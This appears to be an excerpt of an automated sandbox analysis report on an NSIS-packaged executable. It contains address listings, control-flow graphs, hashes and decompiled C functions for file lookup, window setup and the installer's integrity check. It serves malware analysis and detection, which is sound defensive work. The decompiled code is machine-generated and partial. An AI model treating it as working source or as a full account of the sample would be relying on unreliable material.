                                              0x0040675d
                                              0x00406760
                                              0x00000000
                                              0x00000000
                                              0x00406768
                                              0x0040676b
                                              0x0040676e
                                              0x00406770
                                              0x00406772
                                              0x00406772
                                              0x00406773
                                              0x00406776
                                              0x0040677d
                                              0x00406780
                                              0x0040678e
                                              0x00000000
                                              0x00000000
                                              0x00406a64
                                              0x00406a64
                                              0x00406a67
                                              0x00406a6e
                                              0x00000000
                                              0x00000000
                                              0x00406a73
                                              0x00406a73
                                              0x00406a77
                                              0x00406baf
                                              0x00000000
                                              0x00406baf
                                              0x00406a7d
                                              0x00406a80
                                              0x00406a83
                                              0x00406a87
                                              0x00406a8a
                                              0x00406a90
                                              0x00406a92
                                              0x00406a92
                                              0x00406a92
                                              0x00406a95
                                              0x00406a98
                                              0x00406a98
                                              0x00406a98
                                              0x00406a98
                                              0x00406a9b
                                              0x00406a9b
                                              0x00406a9f
                                              0x00406aff
                                              0x00406b02
                                              0x00406b07
                                              0x00406b08
                                              0x00406b0a
                                              0x00406b0c
                                              0x00406b0f
                                              0x00000000
                                              0x00406b0f
                                              0x00406aa1
                                              0x00406aa7
                                              0x00406aaa
                                              0x00406aad
                                              0x00406ab0
                                              0x00406ab3
                                              0x00406ab6
                                              0x00406ab9
                                              0x00406abc
                                              0x00406abf
                                              0x00406ac2
                                              0x00406adb
                                              0x00406ade
                                              0x00406ae1
                                              0x00406ae4
                                              0x00406ae8
                                              0x00406aea
                                              0x00406aea
                                              0x00406aeb
                                              0x00406aee
                                              0x00406ac4
                                              0x00406ac4
                                              0x00406acc
                                              0x00406ad1
                                              0x00406ad3
                                              0x00406ad6
                                              0x00406ad6
                                              0x00406af1
                                              0x00406af8
                                              0x00000000
                                              0x00406afa
                                              0x00000000
                                              0x00406afa
                                              0x00000000
                                              0x00406796
                                              0x00406799
                                              0x004067cf
                                              0x004068ff
                                              0x004068ff
                                              0x004068ff
                                              0x004068ff
                                              0x00406902
                                              0x00406902
                                              0x00406905
                                              0x00406907
                                              0x00406b91
                                              0x00000000
                                              0x00406b91
                                              0x0040690d
                                              0x00406910
                                              0x00000000
                                              0x00000000
                                              0x00406916
                                              0x0040691a
                                              0x0040691d
                                              0x0040691d
                                              0x0040691d
                                              0x00000000
                                              0x0040691d
                                              0x0040679b
                                              0x0040679d
                                              0x0040679f
                                              0x004067a1
                                              0x004067a4
                                              0x004067a5
                                              0x004067a7
                                              0x004067a9
                                              0x004067ac
                                              0x004067af
                                              0x004067c5
                                              0x004067ca
                                              0x00406802
                                              0x00406802
                                              0x00406806
                                              0x00406832
                                              0x00406834
                                              0x0040683b
                                              0x0040683e
                                              0x00406841
                                              0x00406841
                                              0x00406846
                                              0x00406846
                                              0x00406848
                                              0x0040684b
                                              0x00406852
                                              0x00406855
                                              0x00406882
                                              0x00406882
                                              0x00406885
                                              0x00406888
                                              0x004068fc
                                              0x004068fc
                                              0x004068fc
                                              0x00000000
                                              0x004068fc
                                              0x0040688a
                                              0x00406890
                                              0x00406893
                                              0x00406896
                                              0x00406899
                                              0x0040689c
                                              0x0040689f
                                              0x004068a2
                                              0x004068a5
                                              0x004068a8
                                              0x004068ab
                                              0x004068c4
                                              0x004068c6
                                              0x004068c9
                                              0x004068ca
                                              0x004068cd
                                              0x004068cf
                                              0x004068d2
                                              0x004068d4
                                              0x004068d6
                                              0x004068d9
                                              0x004068db
                                              0x004068de
                                              0x004068e2
                                              0x004068e4
                                              0x004068e4
                                              0x004068e5
                                              0x004068e8
                                              0x004068eb
                                              0x004068ad
                                              0x004068ad
                                              0x004068b5
                                              0x004068ba
                                              0x004068bc
                                              0x004068bf
                                              0x004068bf
                                              0x004068ee
                                              0x004068f5
                                              0x0040687f
                                              0x0040687f
                                              0x0040687f
                                              0x0040687f
                                              0x00000000
                                              0x004068f7
                                              0x00000000
                                              0x004068f7
                                              0x004068f5
                                              0x00406808
                                              0x0040680b
                                              0x0040680d
                                              0x00406810
                                              0x00406813
                                              0x00406816
                                              0x00406818
                                              0x0040681b
                                              0x0040681e
                                              0x0040681e
                                              0x00406821
                                              0x00406821
                                              0x00406824
                                              0x0040682b
                                              0x004067ff
                                              0x004067ff
                                              0x004067ff
                                              0x004067ff
                                              0x00000000
                                              0x0040682d
                                              0x00000000
                                              0x0040682d
                                              0x0040682b
                                              0x004067b1
                                              0x004067b4
                                              0x004067b6
                                              0x004067b9
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x004066a3
                                              0x004066a3
                                              0x004066a7
                                              0x00406b6d
                                              0x00000000
                                              0x00406b6d
                                              0x004066ad
                                              0x004066b0
                                              0x004066b3
                                              0x004066b6
                                              0x004066b8
                                              0x004066b8
                                              0x004066b8
                                              0x004066bb
                                              0x004066be
                                              0x004066c1
                                              0x004066c4
                                              0x004066c7
                                              0x004066ca
                                              0x004066cb
                                              0x004066cd
                                              0x004066cd
                                              0x004066cd
                                              0x004066d0
                                              0x004066d3
                                              0x004066d6
                                              0x004066d9
                                              0x004066d9
                                              0x004066d9
                                              0x004066dc
                                              0x00000000
                                              0x00000000
                                              0x00406920
                                              0x00406920
                                              0x00406920
                                              0x00406924
                                              0x00000000
                                              0x00000000
                                              0x0040692a
                                              0x0040692d
                                              0x00406930
                                              0x00406933
                                              0x00406935
                                              0x00406935
                                              0x00406935
                                              0x00406938
                                              0x0040693b
                                              0x0040693e
                                              0x00406941
                                              0x00406944
                                              0x00406947
                                              0x00406948
                                              0x0040694a
                                              0x0040694a
                                              0x0040694a
                                              0x0040694d
                                              0x00406950
                                              0x00406953
                                              0x00406956
                                              0x00406959
                                              0x0040695d
                                              0x0040695f
                                              0x00406962
                                              0x00000000
                                              0x00406964
                                              0x00000000
                                              0x00406964
                                              0x00406962
                                              0x00406b97
                                              0x00000000
                                              0x00000000
                                              0x004061c6

                                              Memory Dump Source
                                              • Source File: 00000000.00000002.302029421.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.302004824.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302049001.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302057343.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302063724.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302177827.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302199848.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302210667.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_qHpeBvr9cR.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 9df4b00e3dfa736f107e28386e2211fee1d6be591f2ba6f0ce01288237ab4b61
                                              • Instruction ID: bdeebfab4b2853dd6ba105009d9d55a4887b03880c8adf7539db3398297304ab
                                              • Opcode Fuzzy Hash: 9df4b00e3dfa736f107e28386e2211fee1d6be591f2ba6f0ce01288237ab4b61
                                              • Instruction Fuzzy Hash: 61F16871D00229CBCF28CFA8C8946ADBBB1FF45305F25816ED856BB281D7785A96CF44
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00405FF6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 627 405ff6-40600a FindFirstFileA 628 406017 627->628 629 40600c-406015 FindClose 627->629 630 406019-40601a 628->630 629->630
                                              C-Code - Quality: 100%
                                              			E00405FF6(CHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileA(_a4, 0x4225d0); // executed
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2);
				return 0x4225d0;
			}




                                              0x00406001
                                              0x0040600a
                                              0x00000000
                                              0x00406017
                                              0x0040600d
                                              0x00000000

                                              APIs
                                              • FindFirstFileA.KERNELBASE(?,004225D0,C:\,00405912,C:\,C:\,00000000,C:\,C:\,?,?,766DF560,00405634,?,C:\Users\user\AppData\Local\Temp\,766DF560), ref: 00406001
                                              • FindClose.KERNEL32(00000000), ref: 0040600D
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.302029421.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.302004824.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302049001.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302057343.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302063724.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302177827.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302199848.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302210667.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_qHpeBvr9cR.jbxd
                                              Similarity
                                              • API ID: Find$CloseFileFirst
                                              • String ID: C:\
                                              • API String ID: 2295610775-3404278061
                                              • Opcode ID: af11e85da2dc783dbe13656bd5508f9fb20cf1c530974d89e4c44af9708dc560
                                              • Instruction ID: bebaf1ec17e03c7be3b4f7568d9df3fae16269376aceebcceaf96dbad000be3e
                                              • Opcode Fuzzy Hash: af11e85da2dc783dbe13656bd5508f9fb20cf1c530974d89e4c44af9708dc560
                                              • Instruction Fuzzy Hash: 20D012719480206BC3105B387D0C85B7A589F89330711CA33F566FA2E0D7749CB2AAED
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0040374E Relevance: 49.2, APIs: 13, Strings: 15, Instructions: 215stringregistryCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 134 40374e-403766 call 406087 137 403768-403778 call 405c59 134->137 138 40377a-4037a1 call 405be2 134->138 147 4037c4-4037ed call 403a17 call 4058cf 137->147 143 4037a3-4037b4 call 405be2 138->143 144 4037b9-4037bf lstrcatA 138->144 143->144 144->147 152 4037f3-4037f8 147->152 153 403874-40387c call 4058cf 147->153 152->153 154 4037fa-40381e call 405be2 152->154 159 40388a-4038af LoadImageA 153->159 160 40387e-403885 call 405d1d 153->160 154->153 161 403820-403822 154->161 163 4038b5-4038eb RegisterClassA 159->163 164 40393e-403946 call 40140b 159->164 160->159 165 403833-40383f lstrlenA 161->165 166 403824-403831 call 405819 161->166 167 4038f1-403939 SystemParametersInfoA CreateWindowExA 163->167 168 403a0d 163->168 177 403950-40395b call 403a17 164->177 178 403948-40394b 164->178 172 403841-40384f lstrcmpiA 165->172 173 403867-40386f call 4057ee call 405cfb 165->173 166->165 167->164 171 403a0f-403a16 168->171 172->173 176 403851-40385b GetFileAttributesA 172->176 173->153 180 403861-403862 call 405835 176->180 181 40385d-40385f 176->181 187 403961-40397b ShowWindow call 40601d 177->187 188 4039e4-4039ec call 4050b9 177->188 178->171 180->173 181->173 181->180 193 403987-403999 GetClassInfoA 187->193 194 40397d-403982 call 40601d 187->194 195 403a06-403a08 call 40140b 188->195 196 4039ee-4039f4 188->196 200 4039b1-4039e2 DialogBoxParamA call 40140b call 40369e 193->200 201 40399b-4039ab GetClassInfoA RegisterClassA 193->201 194->193 195->168 196->178 197 4039fa-403a01 call 40140b 196->197 197->178 200->171 201->200
                                              C-Code - Quality: 96%
                                              			E0040374E(void* __eflags) {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				int _v16;
				char _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t20;
				void* _t28;
				void* _t30;
				int _t31;
				void* _t34;
				int _t37;
				int _t38;
				int _t42;
				char _t62;
				CHAR* _t64;
				signed char _t68;
				CHAR* _t79;
				intOrPtr _t81;
				CHAR* _t85;

				_t81 =  *0x423f90;
				_t20 = E00406087(3);
				_t88 = _t20;
				if(_t20 == 0) {
					_t79 = 0x420580;
					"1033" = 0x7830;
					E00405BE2(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x420580, 0);
					__eflags =  *0x420580;
					if(__eflags == 0) {
						E00405BE2(0x80000003, ".DEFAULT\\Control Panel\\International",  &M004072F6, 0x420580, 0);
					}
					lstrcatA("1033", _t79);
				} else {
					E00405C59("1033",  *_t20() & 0x0000ffff);
				}
				E00403A17(_t76, _t88);
				_t84 = "C:\\Users\\alfons\\AppData\\Local\\Temp";
				 *0x424000 =  *0x423f98 & 0x00000020;
				 *0x42401c = 0x10000;
				if(E004058CF(_t88, "C:\\Users\\alfons\\AppData\\Local\\Temp") != 0) {
					L16:
					if(E004058CF(_t96, _t84) == 0) {
						E00405D1D(0, _t79, _t81, _t84,  *((intOrPtr*)(_t81 + 0x118)));
					}
					_t28 = LoadImageA( *0x423f80, 0x67, 1, 0, 0, 0x8040); // executed
					 *0x423768 = _t28;
					if( *((intOrPtr*)(_t81 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t30 = E00403A17(_t76, __eflags);
							__eflags =  *0x424020;
							if( *0x424020 != 0) {
								_t31 = E004050B9(_t30, 0);
								__eflags = _t31;
								if(_t31 == 0) {
									E0040140B(1);
									goto L33;
								}
								__eflags =  *0x42374c;
								if( *0x42374c == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x420558, 5);
							_t37 = E0040601D("RichEd20");
							__eflags = _t37;
							if(_t37 == 0) {
								E0040601D("RichEd32");
							}
							_t85 = "RichEdit20A";
							_t38 = GetClassInfoA(0, _t85, 0x423720);
							__eflags = _t38;
							if(_t38 == 0) {
								GetClassInfoA(0, "RichEdit", 0x423720);
								 *0x423744 = _t85;
								RegisterClassA(0x423720);
							}
							_t42 = DialogBoxParamA( *0x423f80,  *0x423760 + 0x00000069 & 0x0000ffff, 0, E00403AE4, 0);
							E0040369E(E0040140B(5), 1);
							return _t42;
						}
						L22:
						_t34 = 2;
						return _t34;
					} else {
						_t76 =  *0x423f80;
						 *0x423734 = _t28;
						_v20 = 0x624e5f;
						 *0x423724 = E00401000;
						 *0x423730 =  *0x423f80;
						 *0x423744 =  &_v20;
						if(RegisterClassA(0x423720) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						_t12 =  &_v16; // 0x624e5f
						SystemParametersInfoA(0x30, 0, _t12, 0);
						 *0x420558 = CreateWindowExA(0x80,  &_v20, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x423f80, 0);
						goto L21;
					}
				} else {
					_t76 =  *(_t81 + 0x48);
					if(_t76 == 0) {
						goto L16;
					}
					_t79 = 0x422f20;
					E00405BE2( *((intOrPtr*)(_t81 + 0x44)), _t76,  *((intOrPtr*)(_t81 + 0x4c)) +  *0x423fb8, 0x422f20, 0);
					_t62 =  *0x422f20; // 0x22
					if(_t62 == 0) {
						goto L16;
					}
					if(_t62 == 0x22) {
						_t79 = 0x422f21;
						 *((char*)(E00405819(0x422f21, 0x22))) = 0;
					}
					_t64 = lstrlenA(_t79) + _t79 - 4;
					if(_t64 <= _t79 || lstrcmpiA(_t64, ?str?) != 0) {
						L15:
						E00405CFB(_t84, E004057EE(_t79));
						goto L16;
					} else {
						_t68 = GetFileAttributesA(_t79);
						if(_t68 == 0xffffffff) {
							L14:
							E00405835(_t79);
							goto L15;
						}
						_t96 = _t68 & 0x00000010;
						if((_t68 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}

























                                              0x00403754
                                              0x0040375d
                                              0x00403764
                                              0x00403766
                                              0x0040377a
                                              0x0040378c
                                              0x00403796
                                              0x0040379b
                                              0x004037a1
                                              0x004037b4
                                              0x004037b4
                                              0x004037bf
                                              0x00403768
                                              0x00403773
                                              0x00403773
                                              0x004037c4
                                              0x004037ce
                                              0x004037d7
                                              0x004037dc
                                              0x004037ed
                                              0x00403874
                                              0x0040387c
                                              0x00403885
                                              0x00403885
                                              0x0040389b
                                              0x004038a1
                                              0x004038af
                                              0x0040393e
                                              0x00403946
                                              0x00403950
                                              0x00403955
                                              0x0040395b
                                              0x004039e5
                                              0x004039ea
                                              0x004039ec
                                              0x00403a08
                                              0x00000000
                                              0x00403a08
                                              0x004039ee
                                              0x004039f4
                                              0x004039fc
                                              0x004039fc
                                              0x00000000
                                              0x004039f4
                                              0x00403969
                                              0x00403974
                                              0x00403979
                                              0x0040397b
                                              0x00403982
                                              0x00403982
                                              0x0040398d
                                              0x00403995
                                              0x00403997
                                              0x00403999
                                              0x004039a2
                                              0x004039a5
                                              0x004039ab
                                              0x004039ab
                                              0x004039ca
                                              0x004039db
                                              0x00000000
                                              0x004039e0
                                              0x00403948
                                              0x0040394a
                                              0x00000000
                                              0x004038b5
                                              0x004038b5
                                              0x004038bb
                                              0x004038c5
                                              0x004038cd
                                              0x004038d7
                                              0x004038dd
                                              0x004038eb
                                              0x00403a0d
                                              0x00403a0d
                                              0x00000000
                                              0x00403a0d
                                              0x004038f1
                                              0x004038fa
                                              0x00403939
                                              0x00000000
                                              0x00403939
                                              0x004037f3
                                              0x004037f3
                                              0x004037f8
                                              0x00000000
                                              0x00000000
                                              0x00403802
                                              0x00403812
                                              0x00403817
                                              0x0040381e
                                              0x00000000
                                              0x00000000
                                              0x00403822
                                              0x00403824
                                              0x00403831
                                              0x00403831
                                              0x00403839
                                              0x0040383f
                                              0x00403867
                                              0x0040386f
                                              0x00000000
                                              0x00403851
                                              0x00403852
                                              0x0040385b
                                              0x00403861
                                              0x00403862
                                              0x00000000
                                              0x00403862
                                              0x0040385d
                                              0x0040385f
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x0040385f
                                              0x0040383f

                                              APIs
                                                • Part of subcall function 00406087: GetModuleHandleA.KERNEL32(?,?,00000000,004032BB,0000000D,SETUPAPI,USERENV,UXTHEME), ref: 00406099
                                                • Part of subcall function 00406087: GetProcAddress.KERNEL32(00000000,?), ref: 004060B4
                                              • lstrcatA.KERNEL32(1033,00420580,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420580,00000000,00000003,C:\Users\user\AppData\Local\Temp\,00000000,"C:\Users\user\Desktop\qHpeBvr9cR.exe",00000000), ref: 004037BF
                                              • lstrlenA.KERNEL32(00422F20,?,?,?,00422F20,00000000,C:\Users\user\AppData\Local\Temp,1033,00420580,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420580,00000000,00000003,C:\Users\user\AppData\Local\Temp\), ref: 00403834
                                              • lstrcmpiA.KERNEL32(?,.exe,00422F20,?,?,?,00422F20,00000000,C:\Users\user\AppData\Local\Temp,1033,00420580,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420580,00000000), ref: 00403847
                                              • GetFileAttributesA.KERNEL32(00422F20), ref: 00403852
                                              • LoadImageA.USER32 ref: 0040389B
                                                • Part of subcall function 00405C59: wsprintfA.USER32 ref: 00405C66
                                              • RegisterClassA.USER32 ref: 004038E2
                                              • SystemParametersInfoA.USER32(00000030,00000000,_Nb,00000000), ref: 004038FA
                                              • CreateWindowExA.USER32 ref: 00403933
                                              • ShowWindow.USER32(00000005,00000000), ref: 00403969
                                              • GetClassInfoA.USER32 ref: 00403995
                                              • GetClassInfoA.USER32 ref: 004039A2
                                              • RegisterClassA.USER32 ref: 004039AB
                                              • DialogBoxParamA.USER32 ref: 004039CA
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.302029421.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.302004824.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302049001.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302057343.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302063724.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302177827.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302199848.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302210667.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_qHpeBvr9cR.jbxd
                                              Similarity
                                              • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                              • String ID: /B$ 7B$!/B$"C:\Users\user\Desktop\qHpeBvr9cR.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                              • API String ID: 1975747703-1729321324
                                              • Opcode ID: 63b9a726db211dfa8162015ea6a93c81adf93a5d18f7de7b76b8cf033c026b55
                                              • Instruction ID: 6194fd7cfee4ca64757fce53943c04d911d469c5366995da23240c14efb645f2
                                              • Opcode Fuzzy Hash: 63b9a726db211dfa8162015ea6a93c81adf93a5d18f7de7b76b8cf033c026b55
                                              • Instruction Fuzzy Hash: 6161B6B17442407ED620BF65AD45F2B3ABCEB8474AF40453FF941B22E1D67CA9418A2D
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00402C88 Relevance: 26.5, APIs: 5, Strings: 10, Instructions: 203memoryCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 208 402c88-402cd6 GetTickCount GetModuleFileNameA call 4059d2 211 402ce2-402d10 call 405cfb call 405835 call 405cfb GetFileSize 208->211 212 402cd8-402cdd 208->212 220 402e00-402e0e call 402be9 211->220 221 402d16-402d2d 211->221 213 402f27-402f2b 212->213 228 402e14-402e17 220->228 229 402edf-402ee4 220->229 223 402d31-402d37 call 4031d5 221->223 224 402d2f 221->224 227 402d3c-402d3e 223->227 224->223 230 402d44-402d4a 227->230 231 402e9b-402ea3 call 402be9 227->231 232 402e43-402e8f GlobalAlloc call 406164 call 405a01 CreateFileA 228->232 233 402e19-402e31 call 403207 call 4031d5 228->233 229->213 234 402dca-402dce 230->234 235 402d4c-402d64 call 405993 230->235 231->229 259 402e91-402e96 232->259 260 402ea5-402ed5 call 403207 call 402f2e 232->260 233->229 256 402e37-402e3d 233->256 243 402dd0-402dd6 call 402be9 234->243 244 402dd7-402ddd 234->244 235->244 253 402d66-402d6d 235->253 243->244 246 402df0-402dfa 244->246 247 402ddf-402ded call 4060f6 244->247 246->220 246->221 247->246 253->244 258 402d6f-402d76 253->258 256->229 256->232 258->244 261 402d78-402d7f 258->261 259->213 268 402eda-402edd 260->268 261->244 263 402d81-402d88 261->263 263->244 265 402d8a-402daa 263->265 265->229 267 402db0-402db4 265->267 269 402db6-402dba 267->269 270 402dbc-402dc4 267->270 268->229 271 402ee6-402ef7 268->271 269->220 269->270 270->244 274 402dc6-402dc8 270->274 272 402ef9 271->272 273 402eff-402f04 271->273 272->273 275 402f05-402f0b 273->275 274->244 275->275 276 402f0d-402f25 call 405993 275->276 276->213
                                              C-Code - Quality: 96%
                                              			E00402C88(void* __eflags, signed int _a4) {
				long _v8;
				long _v12;
				intOrPtr _v16;
				long _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				signed int _v40;
				char _v300;
				long _t54;
				void* _t57;
				void* _t62;
				intOrPtr _t65;
				void* _t68;
				intOrPtr* _t70;
				intOrPtr _t71;
				long _t82;
				void* _t83;
				signed int _t89;
				intOrPtr _t92;
				void* _t101;
				signed int _t103;
				void* _t105;
				long _t106;
				long _t109;
				void* _t110;

				_v8 = 0;
				_v12 = 0;
				 *0x423f8c = GetTickCount() + 0x3e8;
				GetModuleFileNameA(0, "C:\\Users\\alfons\\Desktop\\qHpeBvr9cR.exe", 0x400);
				_t105 = E004059D2("C:\\Users\\alfons\\Desktop\\qHpeBvr9cR.exe", 0x80000000, 3);
				 *0x409014 = _t105;
				if(_t105 == 0xffffffff) {
					return "Error launching installer";
				}
				E00405CFB("C:\\Users\\alfons\\Desktop", "C:\\Users\\alfons\\Desktop\\qHpeBvr9cR.exe");
				E00405CFB(0x42c000, E00405835("C:\\Users\\alfons\\Desktop"));
				_t54 = GetFileSize(_t105, 0);
				 *0x41f130 = _t54;
				_t109 = _t54;
				if(_t54 <= 0) {
					L22:
					E00402BE9(1);
					if( *0x423f94 == 0) {
						goto L30;
					}
					if(_v12 == 0) {
						L26:
						_t57 = GlobalAlloc(0x40, _v20); // executed
						_t110 = _t57;
						E00406164(0x40b098);
						E00405A01( &_v300, "C:\\Users\\alfons\\AppData\\Local\\Temp\\"); // executed
						_t62 = CreateFileA( &_v300, 0xc0000000, 0, 0, 2, 0x4000100, 0); // executed
						 *0x409018 = _t62;
						if(_t62 != 0xffffffff) {
							_t65 = E00403207( *0x423f94 + 0x1c);
							 *0x41f134 = _t65;
							 *0x417128 = _t65 - ( !_v40 & 0x00000004) + _v16 - 0x1c; // executed
							_t68 = E00402F2E(_v16, 0xffffffff, 0, _t110, _v20); // executed
							if(_t68 == _v20) {
								 *0x423f90 = _t110;
								 *0x423f98 =  *_t110;
								if((_v40 & 0x00000001) != 0) {
									 *0x423f9c =  *0x423f9c + 1;
								}
								_t45 = _t110 + 0x44; // 0x44
								_t70 = _t45;
								_t101 = 8;
								do {
									_t70 = _t70 - 8;
									 *_t70 =  *_t70 + _t110;
									_t101 = _t101 - 1;
								} while (_t101 != 0);
								_t71 =  *0x417124; // 0x54f53
								 *((intOrPtr*)(_t110 + 0x3c)) = _t71;
								E00405993(0x423fa0, _t110 + 4, 0x40);
								return 0;
							}
							goto L30;
						}
						return "Error writing temporary file. Make sure your temp folder is valid.";
					}
					E00403207( *0x417120);
					if(E004031D5( &_a4, 4) == 0 || _v8 != _a4) {
						goto L30;
					} else {
						goto L26;
					}
				} else {
					do {
						_t106 = _t109;
						asm("sbb eax, eax");
						_t82 = ( ~( *0x423f94) & 0x00007e00) + 0x200;
						if(_t109 >= _t82) {
							_t106 = _t82;
						}
						_t83 = E004031D5(0x417130, _t106); // executed
						if(_t83 == 0) {
							E00402BE9(1);
							L30:
							return "Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						if( *0x423f94 != 0) {
							if((_a4 & 0x00000002) == 0) {
								E00402BE9(0);
							}
							goto L19;
						}
						E00405993( &_v40, 0x417130, 0x1c);
						_t89 = _v40;
						if((_t89 & 0xfffffff0) == 0 && _v36 == 0xdeadbeef && _v24 == 0x74736e49 && _v28 == 0x74666f73 && _v32 == 0x6c6c754e) {
							_a4 = _a4 | _t89;
							_t103 =  *0x417120; // 0x1da6b
							 *0x424020 =  *0x424020 | _a4 & 0x00000002;
							_t92 = _v16;
							 *0x423f94 = _t103;
							if(_t92 > _t109) {
								goto L30;
							}
							if((_a4 & 0x00000008) != 0 || (_a4 & 0x00000004) == 0) {
								_v12 = _v12 + 1;
								_t109 = _t92 - 4;
								if(_t106 > _t109) {
									_t106 = _t109;
								}
								goto L19;
							} else {
								goto L22;
							}
						}
						L19:
						if(_t109 <  *0x41f130) {
							_v8 = E004060F6(_v8, 0x417130, _t106);
						}
						 *0x417120 =  *0x417120 + _t106;
						_t109 = _t109 - _t106;
					} while (_t109 > 0);
					goto L22;
				}
			}






























                                              0x00402c96
                                              0x00402c99
                                              0x00402cb3
                                              0x00402cb8
                                              0x00402ccb
                                              0x00402cd0
                                              0x00402cd6
                                              0x00000000
                                              0x00402cd8
                                              0x00402ce9
                                              0x00402cfa
                                              0x00402d01
                                              0x00402d09
                                              0x00402d0e
                                              0x00402d10
                                              0x00402e00
                                              0x00402e02
                                              0x00402e0e
                                              0x00000000
                                              0x00000000
                                              0x00402e17
                                              0x00402e43
                                              0x00402e48
                                              0x00402e53
                                              0x00402e55
                                              0x00402e66
                                              0x00402e81
                                              0x00402e8a
                                              0x00402e8f
                                              0x00402eae
                                              0x00402ebe
                                              0x00402ed0
                                              0x00402ed5
                                              0x00402edd
                                              0x00402eea
                                              0x00402ef2
                                              0x00402ef7
                                              0x00402ef9
                                              0x00402ef9
                                              0x00402f01
                                              0x00402f01
                                              0x00402f04
                                              0x00402f05
                                              0x00402f05
                                              0x00402f08
                                              0x00402f0a
                                              0x00402f0a
                                              0x00402f0d
                                              0x00402f14
                                              0x00402f20
                                              0x00000000
                                              0x00402f25
                                              0x00000000
                                              0x00402edd
                                              0x00000000
                                              0x00402e91
                                              0x00402e1f
                                              0x00402e31
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00402d16
                                              0x00402d16
                                              0x00402d1b
                                              0x00402d1f
                                              0x00402d26
                                              0x00402d2d
                                              0x00402d2f
                                              0x00402d2f
                                              0x00402d37
                                              0x00402d3e
                                              0x00402e9d
                                              0x00402edf
                                              0x00000000
                                              0x00402edf
                                              0x00402d4a
                                              0x00402dce
                                              0x00402dd1
                                              0x00402dd6
                                              0x00000000
                                              0x00402dce
                                              0x00402d57
                                              0x00402d5c
                                              0x00402d64
                                              0x00402d8a
